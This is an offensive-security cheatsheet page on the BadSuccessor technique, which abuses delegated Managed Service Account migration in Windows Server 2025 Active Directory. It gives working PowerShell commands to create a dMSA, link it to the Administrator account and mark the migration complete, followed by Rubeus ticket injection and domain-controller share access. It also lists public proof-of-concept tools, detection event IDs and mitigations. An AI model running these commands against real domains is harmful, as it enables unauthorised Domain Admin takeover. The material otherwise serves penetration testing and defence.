daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

badsuccessor-dmsa-migration-abuse.md (7100B)


      1 ---
      2 title: "BadSuccessor: Privilege Escalation via Delegated MSA Migration Abuse"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/badsuccessor-dmsa-migration-abuse.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # BadSuccessor: Privilege Escalation via Delegated MSA Migration Abuse
     14 
     15 ## Overview
     16 
     17 Delegated Managed Service Accounts (**dMSA**) are the next-generation successor of **gMSA** that ship in Windows Server 2025.  A legitimate migration workflow allows administrators to replace an *old* account (user, computer or service account) with a dMSA while transparently preserving permissions.  The workflow is exposed through PowerShell cmdlets such as `Start-ADServiceAccountMigration` and `Complete-ADServiceAccountMigration` and relies on two LDAP attributes of the **dMSA object**:
     18 
     19 * **`msDS-ManagedAccountPrecededByLink`** – *DN link* to the superseded (old) account.
     20 * **`msDS-DelegatedMSAState`**       – migration state (`0` = none, `1` = in-progress, `2` = *completed*).<sup>[[1]](#references)</sup>
     21 
     22 If an attacker can create **any** dMSA inside an OU and directly manipulate those 2 attributes, LSASS & the KDC will treat the dMSA as a *successor* of the linked account.  When the attacker subsequently authenticates as the dMSA **they inherit all the privileges of the linked account** – up to **Domain Admin** if the Administrator account is linked.<sup>[[1]](#references)</sup>
     23 
     24 This technique was coined **BadSuccessor** by Unit 42 in 2025. Microsoft later assigned it **CVE-2025-53779** and released a security update in **August 2025**. The technique remains relevant to unpatched Windows Server 2025 environments and to reviews of dangerous OU delegation.<sup>[[1]](#references)[[2]](#references)[[6]](#references)</sup>
     25 
     26 ### Attack prerequisites
     27 
     28 1. An account that is *allowed* to create objects inside **an Organizational Unit (OU)** *and* has at least one of:
     29    * `Create Child` → **`msDS-DelegatedManagedServiceAccount`** object class
     30    * `Create Child` → **`All Objects`** (generic create)
     31 2. Network connectivity to LDAP & Kerberos (standard domain joined scenario / remote attack).<sup>[[1]](#references)</sup>
     32 
     33 ## Enumerating Vulnerable OUs
     34 
     35 Unit 42 released a PowerShell helper script that parses security descriptors of each OU and highlights the required ACEs:<sup>[[1]](#references)</sup>
     36 
     37 ```powershell
     38 Get-BadSuccessorOUPermissions.ps1 -Domain contoso.local
     39 ```
     40 
     41 Under the hood the script runs a paged LDAP search for `(objectClass=organizationalUnit)` and checks every `nTSecurityDescriptor` for
     42 
     43 * `ADS_RIGHT_DS_CREATE_CHILD` (0x0001)
     44 * `Active Directory Schema ID: 31ed51fa-77b1-4175-884a-5c6f3f6f34e8` (object class *msDS-DelegatedManagedServiceAccount*)
     45 
     46 ## Exploitation Steps
     47 
     48 Once a writable OU is identified the attack is only 3 LDAP writes away:<sup>[[1]](#references)</sup>
     49 
     50 ```powershell
     51 # 1. Create a new delegated MSA inside the delegated OU
     52 New-ADServiceAccount -Name attacker_dMSA \
     53                      -DNSHostName host.contoso.local \
     54                      -Path "OU=DelegatedOU,DC=contoso,DC=com"
     55 
     56 # 2. Point the dMSA to the target account (e.g. Domain Admin)
     57 Set-ADServiceAccount attacker_dMSA -Add \
     58     @{msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=contoso,DC=com"}
     59 
     60 # 3. Mark the migration as *completed*
     61 Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
     62 ```
     63 
     64 After replication the attacker can simply **logon** as `attacker_dMSA$` or request a Kerberos TGT – Windows will build the token of the *superseded* account.<sup>[[1]](#references)</sup>
     65 
     66 ### Automation
     67 
     68 Several public PoCs wrap the entire workflow including password retrieval and ticket management:
     69 
     70 * SharpSuccessor (C#) – [https://github.com/logangoins/SharpSuccessor](https://github.com/logangoins/SharpSuccessor)<sup>[[3]](#references)</sup>
     71 * BadSuccessor.ps1 (PowerShell) – [https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1](https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1)<sup>[[4]](#references)</sup>
     72 * NetExec module – `badsuccessor` (Python) – [https://github.com/Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)<sup>[[5]](#references)</sup>
     73 
     74 ### Post-Exploitation
     75 
     76 ```powershell
     77 # Request a TGT for the dMSA and inject it (Rubeus)
     78 Rubeus asktgt /user:attacker_dMSA$ /password:<ClearTextPwd> /domain:contoso.local
     79 Rubeus ptt /ticket:<Base64TGT>
     80 
     81 # Access Domain Admin resources
     82 dir \\DC01\C$
     83 ```
     84 
     85 ## Detection & Hunting
     86 
     87 Enable **Object Auditing** on OUs and monitor for the following Windows Security Events:<sup>[[1]](#references)[[2]](#references)</sup>
     88 
     89 * **5137** – Creation of the **dMSA** object
     90 * **5136** – Modification of **`msDS-ManagedAccountPrecededByLink`**
     91 * **4662** – Specific attribute changes
     92   * GUID `2f5c138a-bd38-4016-88b4-0ec87cbb4919` → `msDS-DelegatedMSAState`
     93   * GUID `a0945b2b-57a2-43bd-b327-4d112a4e8bd1` → `msDS-ManagedAccountPrecededByLink`
     94 * **2946** – TGT issuance for the dMSA
     95 
     96 Correlating `4662` (attribute modification), `4741` (creation of a computer/service account) and `4624` (subsequent logon) quickly highlights BadSuccessor activity.  XDR solutions such as **XSIAM** ship with ready-to-use queries (see references).<sup>[[2]](#references)</sup>
     97 
     98 ## Mitigation
     99 
    100 * Apply Microsoft's security update for **CVE-2025-53779** and verify the patch level of every Windows Server 2025 domain controller.<sup>[[6]](#references)</sup>
    101 * Apply the principle of **least privilege** – only delegate *Service Account* management to trusted roles.
    102 * Remove `Create Child` / `msDS-DelegatedManagedServiceAccount` from OUs that do not explicitly require it.
    103 * Monitor for the event IDs listed above and alert on *non-Tier-0* identities creating or editing dMSAs.
    104 
    105 ## See also
    106 
    107 
    108 [Golden Dmsa Gmsa](/hacktricks/windows-hardening/active-directory-methodology/golden-dmsa-gmsa)
    109 
    110 ## References
    111 
    112 - [1] [BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory – Akamai](https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory)
    113 - [2] [Unit42 – When Good Accounts Go Bad: Exploiting Delegated Managed Service Accounts](https://unit42.paloaltonetworks.com/badsuccessor-attack-vector/)
    114 - [3] [SharpSuccessor PoC](https://github.com/logangoins/SharpSuccessor)
    115 - [4] [BadSuccessor.ps1 – Pentest-Tools-Collection](https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1)
    116 - [5] [NetExec BadSuccessor module](https://github.com/Pennyw0rth/NetExec/blob/main/nxc/modules/badsuccessor.py)
    117 - [6] [Microsoft Security Response Center – CVE-2025-53779](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53779)